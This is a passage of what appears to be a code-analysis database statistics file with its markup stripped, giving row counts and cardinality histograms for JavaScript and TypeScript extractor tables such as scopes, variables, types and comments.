+3145090 + + +value +216517 + + +raw +234110 + + +expr +3145090 + + + + +value +raw + + +12 + + +1 +2 +201221 + + +2 +25 +15296 + + + + + + +value +expr + + +12 + + +1 +2 +95821 + + +2 +3 +41222 + + +3 +4 +19627 + + +4 +5 +16097 + + +5 +9 +18825 + + +9 +31 +16474 + + +31 +122435 +8451 + + + + + + +raw +value + + +12 + + +1 +2 +234110 + + + + + + +raw +expr + + +12 + + +1 +2 +104635 + + +2 +3 +47230 + + +3 +4 +20082 + + +4 +5 +16835 + + +5 +9 +19610 + + +9 +34 +17695 + + +34 +120241 +8023 + + + + + + +expr +value + + +12 + + +1 +2 +3145090 + + + + + + +expr +raw + + +12 + + +1 +2 +3145090 + + + + + + + + +enclosing_stmt +5372899 + + +expr +5372899 + + +stmt +854574 + + + + +expr +stmt + + +12 + + +1 +2 +5372899 + + + + + + +stmt +expr + + +12 + + +1 +3 +74578 + + +3 +4 +254844 + + +4 +5 +57228 + + +5 +6 +136234 + + +6 +7 +44557 + + +7 +8 +79401 + + +8 +9 +55420 + + +9 +11 +63155 + + +11 +17 +65146 + + +17 +88321 +24011 + + + + + + + + +expr_containers +5495305 + + +expr +5495305 + + +container +118511 + + + + +expr +container + + +12 + + +1 +2 +5495305 + + + + + + +container +expr + + +12 + + +1 +4 +7197 + + +4 +6 +9110 + + +6 +8 +9222 + + +8 +10 +8424 
+ + +10 +13 +10651 + + +13 +16 +8706 + + +16 +20 +9358 + + +20 +25 +9955 + + +25 +31 +8893 + + +31 +40 +9356 + + +40 +54 +9017 + + +54 +85 +8935 + + +85 +484 +8890 + + +484 +459128 +797 + + + + + + + + +array_size +28188 + + +ae +28188 + + +sz +118 + + + + +ae +sz + + +12 + + +1 +2 +28188 + + + + + + +sz +ae + + +12 + + +1 +2 +52 + + +2 +3 +21 + + +3 +5 +9 + + +5 +8 +9 + + +9 +20 +9 + + +22 +181 +9 + + +231 +12345 +9 + + + + + + + + +is_delegating +4 + + +yield +4 + + + + + +expr_contains_template_tag_location +31 + + +expr +31 + + +location +31 + + + + +expr +location + + +12 + + +1 +2 +31 + + + + + + +location +expr + + +12 + + +1 +2 +31 + + + + + + + + +template_placeholder_tag_info +283 + + +node +283 + + +parentNode +92 + + +raw +24 + + + + +node +parentNode + + +12 + + +1 +2 +283 + + + + + + +node +raw + + +12 + + +1 +2 +283 + + + + + + +parentNode +node + + +12 + + +1 +2 +49 + + +2 +3 +4 + + +3 +4 +9 + + +5 +6 +9 + + +6 +7 +4 + + +7 +8 +13 + + +9 +11 +4 + + + + + + +parentNode +raw + + +12 + + +1 +2 +49 + + +2 +3 +4 + + +3 +4 +9 + + +4 +5 +11 + + +5 +6 +13 + + +6 +11 +6 + + + + + + +raw +node + + +12 + + +1 +2 +2 + + +2 +3 +4 + + +3 +4 +9 + + +4 +6 +2 + + +16 +17 +2 + + +20 +26 +2 + + +34 +45 +2 + + +82 +83 +1 + + + + + + +raw +parentNode + + +12 + + +1 +2 +2 + + +2 +3 +4 + + +3 +4 +9 + + +4 +6 +2 + + +16 +17 +2 + + +20 +26 +2 + + +34 +41 +2 + + +44 +45 +1 + + + + + + + + +scopes +id +118172 + + +id +118172 + + +kind +8 + + + + +id +kind + + +12 + + +1 +2 +118172 + + + + + + +kind +id + + +12 + + +1 +2 +1 + + +4 +5 +1 + + +17 +18 +1 + + +21 +22 +1 + + +28 +29 +1 + + +584 +585 +1 + + +1272 +1273 +1 + + +116245 +116246 +1 + + + + + + + + +scopenodes +118171 + + +node +118171 + + +scope +118171 + + + + +node +scope + + +12 + + +1 +2 +118171 + + + + + + +scope +node + + +12 + + +1 +2 +118171 + + + + + + + + +scopenesting +118171 + + +inner +118171 + + +outer +33143 + + + + +inner +outer + + +12 + + +1 +2 +118171 + + + + + + +outer +inner + + +12 + + +1 +2 +17868 
+ + +2 +3 +6196 + + +3 +4 +2666 + + +4 +6 +2791 + + +6 +13 +2584 + + +13 +17277 +1038 + + + + + + + + +is_generator +62 + + +fun +62 + + + + + +has_rest_parameter +33 + + +fun +33 + + + + + +is_async +50 + + +fun +50 + + + + + +variables +id +364388 + + +id +364388 + + +name +56559 + + +scope +118168 + + + + +id +name + + +12 + + +1 +2 +364388 + + + + + + +id +scope + + +12 + + +1 +2 +364388 + + + + + + +name +id + + +12 + + +1 +2 +38013 + + +2 +3 +9547 + + +3 +5 +4518 + + +5 +115 +4242 + + +115 +116259 +239 + + + + + + +name +scope + + +12 + + +1 +2 +38013 + + +2 +3 +9547 + + +3 +5 +4518 + + +5 +115 +4242 + + +115 +116259 +239 + + + + + + +scope +id + + +12 + + +1 +2 +39907 + + +2 +3 +32053 + + +3 +4 +18882 + + +4 +5 +9814 + + +5 +8 +10909 + + +8 +8779 +6603 + + + + + + +scope +name + + +12 + + +1 +2 +39907 + + +2 +3 +32053 + + +3 +4 +18882 + + +4 +5 +9814 + + +5 +8 +10909 + + +8 +8779 +6603 + + + + + + + + +local_type_names +23565 + + +id +23565 + + +name +6080 + + +scope +1614 + + + + +id +name + + +12 + + +1 +2 +23565 + + + + + + +id +scope + + +12 + + +1 +2 +23565 + + + + + + +name +id + + +12 + + +1 +2 +2821 + + +2 +3 +1362 + + +3 +4 +641 + + +4 +6 +508 + + +6 +13 +485 + + +13 +533 +263 + + + + + + +name +scope + + +12 + + +1 +2 +2821 + + +2 +3 +1362 + + +3 +4 +641 + + +4 +6 +508 + + +6 +13 +485 + + +13 +533 +263 + + + + + + +scope +id + + +12 + + +1 +2 +138 + + +2 +3 +109 + + +3 +4 +116 + + +4 +5 +108 + + +5 +7 +140 + + +7 +8 +89 + + +8 +10 +131 + + +10 +12 +112 + + +12 +15 +144 + + +15 +19 +134 + + +19 +25 +132 + + +25 +37 +122 + + +37 +87 +122 + + +87 +221 +17 + + + + + + +scope +name + + +12 + + +1 +2 +138 + + +2 +3 +109 + + +3 +4 +116 + + +4 +5 +108 + + +5 +7 +140 + + +7 +8 +89 + + +8 +10 +131 + + +10 +12 +112 + + +12 +15 +144 + + +15 +19 +134 + + +19 +25 +132 + + +25 +37 +122 + + +37 +87 +122 + + +87 +221 +17 + + + + + + + + +local_namespace_names +20832 + + +id +20832 + + +name +4078 + + +scope +1543 + + + + +id +name + + +12 + + +1 +2 +20832 + + + + + 
+ +id +scope + + +12 + + +1 +2 +20832 + + + + + + +name +id + + +12 + + +1 +2 +1787 + + +2 +3 +859 + + +3 +4 +378 + + +4 +5 +216 + + +5 +8 +364 + + +8 +20 +310 + + +20 +533 +164 + + + + + + +name +scope + + +12 + + +1 +2 +1787 + + +2 +3 +859 + + +3 +4 +378 + + +4 +5 +216 + + +5 +8 +364 + + +8 +20 +310 + + +20 +533 +164 + + + + + + +scope +id + + +12 + + +1 +2 +88 + + +2 +3 +123 + + +3 +4 +120 + + +4 +5 +104 + + +5 +6 +107 + + +6 +7 +70 + + +7 +8 +87 + + +8 +10 +137 + + +10 +12 +122 + + +12 +15 +122 + + +15 +19 +124 + + +19 +26 +120 + + +26 +39 +117 + + +39 +136 +102 + + + + + + +scope +name + + +12 + + +1 +2 +88 + + +2 +3 +123 + + +3 +4 +120 + + +4 +5 +104 + + +5 +6 +107 + + +6 +7 +70 + + +7 +8 +87 + + +8 +10 +137 + + +10 +12 +122 + + +12 +15 +122 + + +15 +19 +124 + + +19 +26 +120 + + +26 +39 +117 + + +39 +136 +102 + + + + + + + + +is_arguments_object +116243 + + +id +116243 + + + + + +bind +1295408 + + +id +1295408 + + +decl +224900 + + + + +id +decl + + +12 + + +1 +2 +1295408 + + + + + + +decl +id + + +12 + + +1 +2 +81789 + + +2 +3 +50824 + + +3 +4 +29919 + + +4 +5 +17755 + + +5 +7 +16901 + + +7 +14 +17790 + + +14 +98305 +9922 + + + + + + + + +decl +250257 + + +id +250257 + + +decl +246998 + + + + +id +decl + + +12 + + +1 +2 +250257 + + + + + + +decl +id + + +12 + + +1 +2 +245772 + + +2 +283 +1226 + + + + + + + + +typebind +36216 + + +id +36216 + + +decl +12650 + + + + +id +decl + + +12 + + +1 +2 +36216 + + + + + + +decl +id + + +12 + + +1 +2 +6781 + + +2 +3 +2435 + + +3 +4 +1133 + + +4 +6 +1127 + + +6 +17 +954 + + +17 +524 +220 + + + + + + + + +typedecl +23573 + + +id +23573 + + +decl +23565 + + + + +id +decl + + +12 + + +1 +2 +23573 + + + + + + +decl +id + + +12 + + +1 +2 +23558 + + +2 +4 +7 + + + + + + + + +namespacedecl +20839 + + +id +20839 + + +decl +20832 + + + + +id +decl + + +12 + + +1 +2 +20839 + + + + + + +decl +id + + +12 + + +1 +2 +20828 + + +2 +5 +4 + + + + + + + + +namespacebind +4300 + + +id +4300 + + +decl +485 + + + + +id +decl + + +12 + + +1 +2 
+4300 + + + + + + +decl +id + + +12 + + +1 +2 +133 + + +2 +3 +46 + + +3 +4 +56 + + +4 +5 +30 + + +5 +7 +37 + + +7 +9 +44 + + +9 +12 +41 + + +12 +17 +38 + + +17 +31 +37 + + +32 +287 +23 + + + + + + + + +properties +id +142723 + + +id +142723 + + +parent +45129 + + +index +4204 + + +kind +3 + + +tostring +67703 + + + + +id +parent + + +12 + + +1 +2 +142723 + + + + + + +id +index + + +12 + + +1 +2 +142723 + + + + + + +id +kind + + +12 + + +1 +2 +142723 + + + + + + +id +tostring + + +12 + + +1 +2 +142723 + + + + + + +parent +id + + +12 + + +1 +2 +15702 + + +2 +3 +17715 + + +3 +4 +4729 + + +4 +6 +3778 + + +6 +4205 +3205 + + + + + + +parent +index + + +12 + + +1 +2 +15702 + + +2 +3 +17715 + + +3 +4 +4729 + + +4 +6 +3778 + + +6 +4205 +3205 + + + + + + +parent +kind + + +12 + + +1 +2 +44603 + + +2 +4 +526 + + + + + + +parent +tostring + + +12 + + +1 +2 +15770 + + +2 +3 +17763 + + +3 +4 +4692 + + +4 +6 +3759 + + +6 +4173 +3145 + + + + + + +index +id + + +12 + + +2 +3 +2827 + + +3 +4 +364 + + +4 +6 +358 + + +6 +8 +337 + + +8 +11713 +316 + + +29427 +45130 +2 + + + + + + +index +parent + + +12 + + +2 +3 +2827 + + +3 +4 +364 + + +4 +6 +358 + + +6 +8 +337 + + +8 +11713 +316 + + +29427 +45130 +2 + + + + + + +index +kind + + +12 + + +1 +2 +4149 + + +2 +4 +55 + + + + + + +index +tostring + + +12 + + +1 +2 +2827 + + +2 +3 +364 + + +3 +5 +358 + + +5 +7 +337 + + +7 +6233 +316 + + +16744 +16747 +2 + + + + + + +kind +id + + +12 + + +338 +339 +1 + + +1529 +1530 +1 + + +140856 +140857 +1 + + + + + + +kind +parent + + +12 + + +204 +205 +1 + + +523 +524 +1 + + +45034 +45035 +1 + + + + + + +kind +index + + +12 + + +36 +37 +1 + + +55 +56 +1 + + +4204 +4205 +1 + + + + + + +kind +tostring + + +12 + + +174 +175 +1 + + +880 +881 +1 + + +66649 +66650 +1 + + + + + + +tostring +id + + +12 + + +1 +2 +46301 + + +2 +3 +13295 + + +3 +6 +5112 + + +6 +2975 +2995 + + + + + + +tostring +parent + + +12 + + +1 +2 +46926 + + +2 +3 +13013 + + +3 +7 +5466 + + +7 +2975 +2298 + + + + + + +tostring +index + + +12 + 
+ +1 +2 +61480 + + +2 +4 +5275 + + +4 +43 +948 + + + + + + +tostring +kind + + +12 + + +1 +2 +67703 + + + + + + + + +is_computed +27 + + +id +27 + + + + + +is_method +392 + + +id +392 + + + + + +is_static +36 + + +id +36 + + + + + +type_alias +1386 + + +aliasType +1386 + + +underlyingType +1361 + + + + +underlyingType +aliasType + + +12 + + +1 +2 +1 + + + + + + +aliasType +underlyingType + + +12 + + +1 +2 +1 + + + + + + + + +type_literal_value +31882 + + +typ +31882 + + +value +31828 + + + + +typ +value + + +12 + + +1 +2 +31882 + + + + + + +value +typ + + +12 + + +1 +2 +31774 + + +2 +3 +54 + + + + + + + + +signature_types +46921 + + +id +46921 + + +kind +2 + + +tostring +27460 + + +type_parameters +11 + + +required_params +22 + + + + +id +kind + + +12 + + +1 +2 +46921 + + + + + + +id +tostring + + +12 + + +1 +2 +46921 + + + + + + +id +type_parameters + + +12 + + +1 +2 +46921 + + + + + + +id +required_params + + +12 + + +1 +2 +46921 + + + + + + +kind +id + + +12 + + +2639 +2640 +1 + + +44282 +44283 +1 + + + + + + +kind +tostring + + +12 + + +2200 +2201 +1 + + +25260 +25261 +1 + + + + + + +kind +type_parameters + + +12 + + +4 +5 +1 + + +11 +12 +1 + + + + + + +kind +required_params + + +12 + + +18 +19 +1 + + +19 +20 +1 + + + + + + +tostring +id + + +12 + + +1 +2 +22069 + + +2 +3 +3061 + + +3 +13 +2112 + + +13 +277 +218 + + + + + + +tostring +kind + + +12 + + +1 +2 +27460 + + + + + + +tostring +type_parameters + + +12 + + +1 +2 +27459 + + +2 +3 +1 + + + + + + +tostring +required_params + + +12 + + +1 +2 +27134 + + +2 +10 +326 + + + + + + +type_parameters +id + + +12 + + +1 +2 +1 + + +13 +14 +1 + + +25 +26 +1 + + +34 +35 +1 + + +42 +43 +1 + + +51 +52 +1 + + +74 +75 +1 + + +139 +140 +1 + + +274 +275 +1 + + +5367 +5368 +1 + + +40901 +40902 +1 + + + + + + +type_parameters +kind + + +12 + + +1 +2 +7 + + +2 +3 +4 + + + + + + +type_parameters +tostring + + +12 + + +1 +2 +1 + + +5 +6 +1 + + +6 +7 +2 + + +8 +9 +2 + + +17 +18 +1 + + +18 +19 +1 + + +158 +159 +1 + + +1805 +1806 +1 
+ + +25429 +25430 +1 + + + + + + +type_parameters +required_params + + +12 + + +1 +2 +1 + + +3 +4 +1 + + +4 +5 +1 + + +5 +6 +1 + + +6 +7 +2 + + +7 +8 +1 + + +8 +9 +2 + + +9 +10 +1 + + +22 +23 +1 + + + + + + +required_params +id + + +12 + + +1 +2 +4 + + +2 +3 +2 + + +3 +5 +2 + + +5 +11 +2 + + +11 +12 +2 + + +44 +131 +2 + + +197 +373 +2 + + +645 +2439 +2 + + +2783 +6853 +2 + + +16407 +17002 +2 + + + + + + +required_params +kind + + +12 + + +1 +2 +7 + + +2 +3 +15 + + + + + + +required_params +tostring + + +12 + + +1 +2 +4 + + +2 +3 +3 + + +4 +5 +1 + + +5 +6 +2 + + +9 +12 +2 + + +39 +62 +2 + + +112 +205 +2 + + +432 +1404 +2 + + +1813 +3662 +2 + + +8431 +11659 +2 + + + + + + +required_params +type_parameters + + +12 + + +1 +2 +12 + + +2 +3 +1 + + +3 +4 +2 + + +5 +7 +2 + + +8 +10 +2 + + +10 +11 +2 + + +11 +12 +1 + + + + + + + + +is_abstract_signature +12 + + +sig +12 + + + + + +signature_rest_parameter +19521 + + +sig +19521 + + +rest_param_arra_type +14259 + + + + +rest_param_arra_type +sig + + +12 + + +1 +2 +1 + + + + + + +sig +rest_param_arra_type + + +12 + + +1 +2 +1 + + + + + + + + +type_contains_signature +87640 + + +typ +68964 + + +kind +2 + + +index +247 + + +sig +37344 + + + + +typ +kind + + +12 + + +1 +2 +68938 + + +2 +3 +26 + + + + + + +typ +index + + +12 + + +1 +2 +59150 + + +2 +3 +5394 + + +3 +248 +4420 + + + + + + +typ +sig + + +12 + + +1 +2 +60034 + + +2 +3 +4557 + + +3 +248 +4373 + + + + + + +kind +typ + + +12 + + +2582 +2583 +1 + + +66408 +66409 +1 + + + + + + +kind +index + + +12 + + +6 +7 +1 + + +247 +248 +1 + + + + + + +kind +sig + + +12 + + +2646 +2647 +1 + + +34698 +34699 +1 + + + + + + +index +typ + + +12 + + +1 +2 +198 + + +2 +3 +21 + + +3 +265 +19 + + +449 +42171 +9 + + + + + + +index +kind + + +12 + + +1 +2 +241 + + +2 +3 +6 + + + + + + +index +sig + + +12 + + +1 +2 +198 + + +2 +3 +24 + + +3 +90 +19 + + +309 +31688 +6 + + + + + + +sig +typ + + +12 + + +1 +2 +35114 + + +2 +896 +2230 + + + + + + +sig +kind + + +12 + + +1 +2 +37344 + + + + + + +sig 
+index + + +12 + + +1 +2 +36489 + + +2 +9 +855 + + + + + + + + +signature_contains_type +107012 + + +child +26824 + + +parent +37344 + + +index +21 + + + + +child +parent + + +12 + + +1 +2 +19848 + + +2 +3 +3736 + + +3 +7 +2017 + + +7 +10275 +1223 + + + + + + +child +index + + +12 + + +1 +2 +22572 + + +2 +3 +3289 + + +3 +22 +963 + + + + + + +parent +child + + +12 + + +1 +2 +3594 + + +2 +3 +18463 + + +3 +4 +10057 + + +4 +5 +3906 + + +5 +11 +1324 + + + + + + +parent +index + + +12 + + +1 +2 +2649 + + +2 +3 +14810 + + +3 +4 +12007 + + +4 +5 +4294 + + +5 +8 +3055 + + +8 +22 +529 + + + + + + +index +child + + +12 + + +1 +2 +2 + + +2 +3 +6 + + +3 +4 +1 + + +5 +6 +1 + + +9 +10 +1 + + +18 +19 +1 + + +106 +107 +1 + + +313 +314 +1 + + +455 +456 +1 + + +643 +644 +1 + + +1088 +1089 +1 + + +2051 +2052 +1 + + +6862 +6863 +1 + + +8789 +8790 +1 + + +12289 +12290 +1 + + + + + + +index +parent + + +12 + + +2 +3 +1 + + +3 +4 +1 + + +4 +5 +2 + + +5 +6 +1 + + +6 +7 +1 + + +17 +18 +1 + + +22 +23 +1 + + +26 +27 +1 + + +37 +38 +1 + + +45 +46 +1 + + +91 +92 +1 + + +219 +220 +1 + + +529 +530 +1 + + +1042 +1043 +1 + + +1574 +1575 +1 + + +3584 +3585 +1 + + +7878 +7879 +1 + + +19885 +19886 +1 + + +34695 +34696 +1 + + +37344 +37345 +1 + + + + + + + + +signature_parameter_name +69668 + + +sig +34695 + + +index +20 + + +name +4071 + + + + +sig +index + + +12 + + +1 +2 +14810 + + +2 +3 +12007 + + +3 +4 +4294 + + +4 +7 +3055 + + +7 +21 +529 + + + + + + +sig +name + + +12 + + +1 +2 +14810 + + +2 +3 +12007 + + +3 +4 +4294 + + +4 +7 +3055 + + +7 +21 +529 + + + + + + +index +sig + + +12 + + +2 +3 +1 + + +3 +4 +1 + + +4 +5 +2 + + +5 +6 +1 + + +6 +7 +1 + + +17 +18 +1 + + +22 +23 +1 + + +26 +27 +1 + + +37 +38 +1 + + +45 +46 +1 + + +91 +92 +1 + + +219 +220 +1 + + +529 +530 +1 + + +1042 +1043 +1 + + +1574 +1575 +1 + + +3584 +3585 +1 + + +7878 +7879 +1 + + +19885 +19886 +1 + + +34695 +34696 +1 + + + + + + +index +name + + +12 + + +2 +3 +1 + + +3 +4 +1 + + +4 +5 +2 + + +5 +6 +2 + + +11 +12 +1 + + +16 +17 +1 + 
+ +18 +19 +1 + + +24 +25 +1 + + +30 +31 +1 + + +45 +46 +1 + + +63 +64 +1 + + +116 +117 +1 + + +188 +189 +1 + + +344 +345 +1 + + +605 +606 +1 + + +1092 +1093 +1 + + +1741 +1742 +1 + + +2122 +2123 +1 + + + + + + +name +sig + + +12 + + +1 +2 +1898 + + +2 +3 +700 + + +3 +4 +294 + + +4 +5 +262 + + +5 +8 +310 + + +8 +24 +309 + + +24 +3588 +298 + + + + + + +name +index + + +12 + + +1 +2 +2804 + + +2 +3 +738 + + +3 +4 +290 + + +4 +15 +239 + + + + + + + + +number_index_type +2038 + + +baseType +2038 + + +propertyType +517 + + + + +baseType +propertyType + + +12 + + +1 +2 +2038 + + + + + + +propertyType +baseType + + +12 + + +1 +2 +435 + + +2 +3 +70 + + +3 +1259 +12 + + + + + + + + +string_index_type +1102 + + +baseType +1102 + + +propertyType +256 + + + + +baseType +propertyType + + +12 + + +1 +2 +1102 + + + + + + +propertyType +baseType + + +12 + + +1 +2 +219 + + +2 +3 +20 + + +3 +436 +17 + + + + + + + + +base_type_names +941 + + +typeName +928 + + +baseTypeName +369 + + + + +typeName +baseTypeName + + +12 + + +1 +2 +917 + + +2 +4 +11 + + + + + + +baseTypeName +typeName + + +12 + + +1 +2 +175 + + +2 +3 +101 + + +3 +4 +29 + + +4 +5 +29 + + +5 +11 +28 + + +15 +41 +7 + + + + + + + + +self_types +19632 + + +typeName +14119 + + +selfType +19632 + + + + +typeName +selfType + + +12 + + +1 +2 +10451 + + +2 +3 +1823 + + +3 +4 +1845 + + + + + + +selfType +typeName + + +12 + + +1 +2 +19632 + + + + + + + + +tuple_type_min_length +241 + + +typ +241 + + +minLength +10 + + + + +typ +minLength + + +12 + + +1 +2 +241 + + + + + + +minLength +typ + + +12 + + +2 +3 +3 + + +3 +4 +1 + + +4 +5 +1 + + +7 +8 +1 + + +20 +21 +1 + + +42 +43 +1 + + +66 +67 +1 + + +93 +94 +1 + + + + + + + + +tuple_type_rest_index +6 + + +typ +6 + + +index +2 + + + + +typ +index + + +12 + + +1 +2 +6 + + + + + + +index +typ + + +12 + + +1 +2 +1 + + +5 +6 +1 + + + + + + + + +comments +id +104947 + + +id +104947 + + +kind +5 + + +toplevel +4497 + + +text +73454 + + +tostring +57955 + + + + +id +kind + + +12 + + +1 +2 
+104947 + + + + + + +id +toplevel + + +12 + + +1 +2 +104947 + + + + + + +id +text + + +12 + + +1 +2 +104947 + + + + + + +id +tostring + + +12 + + +1 +2 +104947 + + + + + + +kind +id + + +12 + + +1 +2 +2 + + +8834 +8835 +1 + + +19270 +19271 +1 + + +76841 +76842 +1 + + + + + + +kind +toplevel + + +12 + + +1 +2 +2 + + +1705 +1706 +1 + + +3107 +3108 +1 + + +3141 +3142 +1 + + + + + + +kind +text + + +12 + + +1 +2 +2 + + +4893 +4894 +1 + + +12759 +12760 +1 + + +55810 +55811 +1 + + + + + + +kind +tostring + + +12 + + +1 +2 +2 + + +1739 +1740 +1 + + +2536 +2537 +1 + + +53678 +53679 +1 + + + + + + +toplevel +id + + +12 + + +1 +2 +1034 + + +2 +3 +512 + + +3 +4 +332 + + +4 +5 +260 + + +5 +7 +388 + + +7 +10 +401 + + +10 +14 +354 + + +14 +21 +365 + + +21 +36 +338 + + +36 +99 +339 + + +99 +6350 +174 + + + + + + +toplevel +kind + + +12 + + +1 +2 +1856 + + +2 +3 +1824 + + +3 +4 +817 + + + + + + +toplevel +text + + +12 + + +1 +2 +1043 + + +2 +3 +533 + + +3 +4 +341 + + +4 +5 +266 + + +5 +7 +396 + + +7 +9 +315 + + +9 +13 +388 + + +13 +20 +385 + + +20 +35 +344 + + +35 +103 +344 + + +103 +4413 +142 + + + + + + +toplevel +tostring + + +12 + + +1 +2 +1054 + + +2 +3 +571 + + +3 +4 +374 + + +4 +5 +297 + + +5 +6 +232 + + +6 +8 +363 + + +8 +11 +345 + + +11 +16 +366 + + +16 +27 +352 + + +27 +60 +338 + + +60 +4394 +205 + + + + + + +text +id + + +12 + + +1 +2 +59626 + + +2 +3 +10314 + + +3 +1417 +3514 + + + + + + +text +kind + + +12 + + +1 +2 +73446 + + +2 +5 +8 + + + + + + +text +toplevel + + +12 + + +1 +2 +62696 + + +2 +3 +8455 + + +3 +257 +2303 + + + + + + +text +tostring + + +12 + + +1 +2 +73446 + + +2 +5 +8 + + + + + + +tostring +id + + +12 + + +1 +2 +44781 + + +2 +3 +9203 + + +3 +4589 +3971 + + + + + + +tostring +kind + + +12 + + +1 +2 +57955 + + + + + + +tostring +toplevel + + +12 + + +1 +2 +48252 + + +2 +3 +7233 + + +3 +513 +2470 + + + + + + +tostring +text + + +12 + + +1 +2 +55262 + + +2 +3403 +2693 + + + + + + + + +types +179398 + + +id +179398 + + +kind +9 + + +tostring +40918 + + + 
+ +id +kind + + +12 + + +1 +2 +179398 + + + + + + +id +tostring + + +12 + + +1 +2 +179398 + + + + + + +kind +id + + +12 + + +1 +2 +5 + + +1802 +1803 +1 + + +6109 +6110 +1 + + +12383 +12384 +1 + + +159099 +159100 +1 + + + + + + +kind +tostring + + +12 + + +1 +2 +5 + + +50 +51 +1 + + +745 +746 +1 + + +7464 +7465 +1 + + +32936 +32937 +1 + + + + + + +tostring +id + + +12 + + +1 +2 +22482 + + +2 +3 +8025 + + +3 +4 +3362 + + +4 +7 +3387 + + +7 +33 +3070 + + +33 +7284 +592 + + + + + + +tostring +kind + + +12 + + +1 +2 +40638 + + +2 +4 +280 + + + + + + + + +type_child +17410 + + +child +9118 + + +parent +7772 + + +idx +296 + + + + +child +parent + + +12 + + +1 +2 +7113 + + +2 +3 +978 + + +3 +8 +686 + + +8 +199 +341 + + + + + + +child +idx + + +12 + + +1 +2 +8255 + + +2 +5 +726 + + +5 +19 +137 + + + + + + +parent +child + + +12 + + +1 +2 +5433 + + +2 +3 +1746 + + +3 +288 +583 + + +288 +297 +10 + + + + + + +parent +idx + + +12 + + +1 +2 +5422 + + +2 +3 +1757 + + +3 +288 +583 + + +288 +297 +10 + + + + + + +idx +child + + +12 + + +1 +2 +1 + + +2 +3 +39 + + +3 +4 +3 + + +4 +5 +61 + + +5 +6 +37 + + +6 +7 +56 + + +7 +12 +22 + + +12 +14 +18 + + +14 +15 +44 + + +17 +6068 +15 + + + + + + +idx +parent + + +12 + + +2 +15 +13 + + +15 +16 +90 + + +19 +20 +81 + + +20 +23 +3 + + +23 +24 +75 + + +24 +55 +23 + + +55 +7773 +11 + + + + + + + + +ast_node_type +1261889 + + +node +1261889 + + +typ +72602 + + + + +node +typ + + +12 + + +1 +2 +1261889 + + + + + + +typ +node + + +12 + + +1 +2 +39248 + + +2 +3 +8371 + + +3 +4 +7888 + + +4 +5 +3053 + + +5 +8 +6417 + + +8 +28 +5528 + + +28 +588233 +2097 + + + + + + + + +declared_function_signature +62664 + + +node +62664 + + +sig +21731 + + + + +node +sig + + +12 + + +1 +2 +62664 + + + + + + +sig +node + + +12 + + +1 +2 +16826 + + +2 +3 +2358 + + +3 +6 +1683 + + +6 +10251 +864 + + + + + + + + +invoke_expr_signature +140668 + + +node +140668 + + +sig +9111 + + + + +node +sig + + +12 + + +1 +2 +140668 + + + + + + +sig +node + + +12 + + +1 +2 +4612 + + 
+2 +3 +1819 + + +3 +4 +737 + + +4 +6 +696 + + +6 +14 +705 + + +14 +68351 +542 + + + + + + + + +invoke_expr_overload_index +73550 + + +node +73550 + + +index +47 + + + + +node +index + + +12 + + +1 +2 +73550 + + + + + + +index +node + + +12 + + +1 +2 +17 + + +2 +3 +7 + + +3 +5 +4 + + +5 +6 +4 + + +6 +8 +3 + + +8 +16 +4 + + +27 +155 +4 + + +211 +68535 +4 + + + + + + + + +symbols +10192 + + +id +10192 + + +kind +3 + + +name +7872 + + + + +id +kind + + +12 + + +1 +2 +10192 + + + + + + +id +name + + +12 + + +1 +2 +10192 + + + + + + +kind +id + + +12 + + +584 +585 +1 + + +2385 +2386 +1 + + +7223 +7224 +1 + + + + + + +kind +name + + +12 + + +30 +31 +1 + + +2385 +2386 +1 + + +5609 +5610 +1 + + + + + + +name +id + + +12 + + +1 +2 +6929 + + +2 +3 +533 + + +3 +273 +410 + + + + + + +name +kind + + +12 + + +1 +2 +7730 + + +2 +4 +142 + + + + + + + + +symbol_parent +7807 + + +symbol +7807 + + +parent +1727 + + + + +symbol +parent + + +12 + + +1 +2 +7807 + + + + + + +parent +symbol + + +12 + + +1 +2 +778 + + +2 +3 +304 + + +3 +4 +212 + + +4 +5 +111 + + +5 +8 +152 + + +8 +26 +136 + + +26 +297 +34 + + + + + + + + +symbol_module +100 + + +symbol +97 + + +moduleName +98 + + + + +symbol +moduleName + + +12 + + +1 +2 +95 + + +2 +4 +2 + + + + + + +moduleName +symbol + + +12 + + +1 +2 +96 + + +2 +3 +2 + + + + + + + + +symbol_global +354 + + +symbol +354 + + +globalName +350 + + + + +symbol +globalName + + +12 + + +1 +2 +354 + + + + + + +globalName +symbol + + +12 + + +1 +2 +347 + + +2 +4 +3 + + + + + + + + +ast_node_symbol +8173 + + +node +8173 + + +symbol +8155 + + + + +node +symbol + + +12 + + +1 +2 +8173 + + + + + + +symbol +node + + +12 + + +1 +2 +8147 + + +2 +12 +8 + + + + + + + + +type_symbol +12383 + + +typ +12383 + + +symbol +6743 + + + + +typ +symbol + + +12 + + +1 +2 +12383 + + + + + + +symbol +typ + + +12 + + +1 +2 +6240 + + +2 +3070 +503 + + + + + + + + +type_property +331170 + + +typ +49305 + + +name +22420 + + +propertyType +130857 + + + + +typ +name + + +12 + + +1 +2 +10275 
+ + +2 +3 +14770 + + +3 +4 +6020 + + +4 +5 +3153 + + +5 +6 +1700 + + +6 +7 +4257 + + +7 +19 +3783 + + +19 +23 +3833 + + +23 +1390 +1514 + + + + + + +typ +propertyType + + +12 + + +1 +2 +19351 + + +2 +3 +10786 + + +3 +4 +5073 + + +4 +6 +2639 + + +6 +7 +3864 + + +7 +22 +3334 + + +22 +33 +3710 + + +33 +1390 +548 + + + + + + +name +typ + + +12 + + +1 +2 +4735 + + +2 +3 +7379 + + +3 +4 +2728 + + +4 +5 +1467 + + +5 +7 +1481 + + +7 +11 +1878 + + +11 +30 +1682 + + +30 +7825 +1070 + + + + + + +name +propertyType + + +12 + + +1 +2 +14690 + + +2 +3 +2698 + + +3 +4 +1925 + + +4 +8 +1697 + + +8 +3373 +1410 + + + + + + +propertyType +typ + + +12 + + +1 +2 +112801 + + +2 +3 +12999 + + +3 +19440 +5057 + + + + + + +propertyType +name + + +12 + + +1 +2 +129508 + + +2 +3475 +1349 + + + + + + + + +lines +id +1622184 + + +id +1622184 + + +toplevel +5312 + + +text +648122 + + +terminator +6 + + + + +id +toplevel + + +12 + + +1 +2 +1622184 + + + + + + +id +text + + +12 + + +1 +2 +1622184 + + + + + + +id +terminator + + +12 + + +1 +2 +1622184 + + + + + + +toplevel +id + + +12 + + +1 +12 +425 + + +12 +24 +415 + + +24 +37 +419 + + +37 +50 +404 + + +50 +66 +411 + + +66 +85 +400 + + +85 +108 +405 + + +108 +138 +402 + + +138 +174 +402 + + +174 +232 +405 + + +232 +331 +399 + + +331 +547 +399 + + +548 +4700 +399 + + +4783 +277404 +27 + + + + + + +toplevel +text + + +12 